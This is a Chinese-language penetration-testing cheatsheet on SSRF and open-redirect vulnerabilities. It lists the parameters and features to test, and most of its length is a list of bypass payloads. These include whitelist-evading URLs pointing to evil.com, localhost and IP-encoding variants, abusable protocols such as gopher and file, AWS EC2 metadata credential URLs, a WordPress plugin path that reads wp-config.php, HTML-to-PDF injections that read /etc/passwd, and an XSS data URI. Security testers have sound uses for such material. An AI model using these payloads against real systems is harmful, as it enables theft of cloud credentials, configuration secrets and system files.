站点跳转功能测试Cheatsheet
字数 1009 2025-08-25 22:58:20
站点跳转功能测试Cheatsheet
概述
本文档总结了针对SSRF(服务器端请求伪造)和URL开放重定向等漏洞的挖掘技巧,可作为渗透测试的参考指南。
常见参数
以下参数常用于站点跳转功能,是测试的重点:
share, next, go, return, wap, link, src, source, target, u, 3g, display, url*, domain, .cgi, destination
功能点测试
以下功能点容易存在跳转漏洞:
- 社交分享功能:获取超链接标题等内容进行显示
- 转码服务:通过URL地址优化网页内容以适应手机屏幕
- 在线翻译:翻译对应网页内容
- 图片加载/下载:富文本编辑器中的图片下载或加载
- 图片/文章收藏功能:读取URL地址中的title和文本内容
- 云服务厂商:远程执行命令判断网站是否存活
- 网站采集/抓取:对输入URL进行信息采集
- 数据库内置功能:如mongodb的copyDatabase函数
- 邮件系统:接收邮件服务器地址
- 编码/文件处理:如ffmpeg, ImageMagick, docx, pdf, xml处理器等
- 未公开API:利用Google语法加上关键字寻找SSRF漏洞
- 远程资源请求:
- upload from url (如Discuz
- import & export rss feed (如web blog)
- 使用xml引擎对象的地方 (如wordpress xmlrpc.php)
防御绕过技巧
基础技巧
http://evil.com:80/
http://evil.com#baidu.com
http://evil.com#baidu.com?baidu.com
http://baidu.com@evil.com
http://evil.com?baidu.com
http://evil.com$baidu.com
http://evil.com?baidu.com
http://evil.com\baidu.com
http://evil.com/baidu.com
http://baiduevil.com/
http://evil.com\\baidu.com
http://username@evil.com#@baidu.com
http://evil.com;.baidu.com
http://evil.com\.baidu.com
http://evilbaidu.com
http://baidu.com.evil.com
http://evil.com://baidu.com
http://evil.com&baidu.com
http://evil.com?jump=baidu.com
/evil.com (无协议)
//evil.com (无协议)
白名单绕过
- 白名单域中可能存在重定向漏洞
- 利用信任的外部域(如baidu, zhihu)作为中间介质导向恶意站点
127.0.0.1及其他IP变异
http://127.0.0.1:22/
http://localhst:22/
http://localhost.backcover7.cc:22/
http://[::]:80/
http://0000::1:80/
http://shorturl.com/xxx
http://127。0。0。1/
xip.name, nip.io, ip6.name, sslip.io
http://www.127.0.0.1.xip.io/ #结合前面的技巧
进制转换
使用在线工具转换IP地址的进制表示:
http://www.ab126.com/system/2859.html
协议利用
0://url
https://url
dict://url
file://url
ftp://url
sftp://url
tftp://url
ldap://url
gopher://url
jar://
php://
weixin:// #客户端伪协议
端口测试
尝试添加不同端口可能有意外效果:
80,443,8080...
http://target.com:80/...
Unicode字符
使用Enclosed alphanumerics等Unicode字符:
ⓔⓔⓔⓧⓧⓧⓐⓐⓐⓜⓜⓜⓟⓟⓟⓛⓛⓛⓔⓔⓔ.ⓒⓒⓒⓞⓞⓞⓜⓜⓜ >>> example.com
其他高级技巧
- DNS Rebinding
- 上传文件:命名为URL地址,通过文件下载或读取功能引入
- curl & 301/302:
http://target.com/ssrf.php?u=http://vps.com/?redirect=x.x.x.x&port=80&info=xxx - AWS EC2元数据:
http://169.254.169.254/latest/meta-data/{local-hostname, public-ipv4} http://169.254.169.254/latest/user-data http://169.254.169.254/latest/meta-data/iam/security-credentials - 开放重定向DoS:
http://url/x.php?u=http://url/x.php?u=http://url/x.php?u=http://url/x.php?u=http://url/x.php?u - SSRF转XSS:
https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg
CMS及插件漏洞
- JIRA version7.3.5:
https://<JIRA_BASEPATH/plugins/servlet/oauth/users/icon-uri?consumerUri=… - JSmol2WP version<1.07:
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php - Qards插件:
http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
HTML转PDF漏洞
"><iframe src="file:///etc/passwd"></iframe>
"><svg/onload=document.write(document.location)>
ImageMagick漏洞
?u=http://x/imagemagicPOC.gif
XSS注入
?url=
?url=data://text/plain;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
总结
本cheatsheet提供了全面的站点跳转功能测试方法,涵盖了从基础参数测试到高级绕过技巧,以及特定CMS和插件的漏洞利用方法。测试时应根据实际情况选择合适的测试向量,并注意不同场景下的防御机制。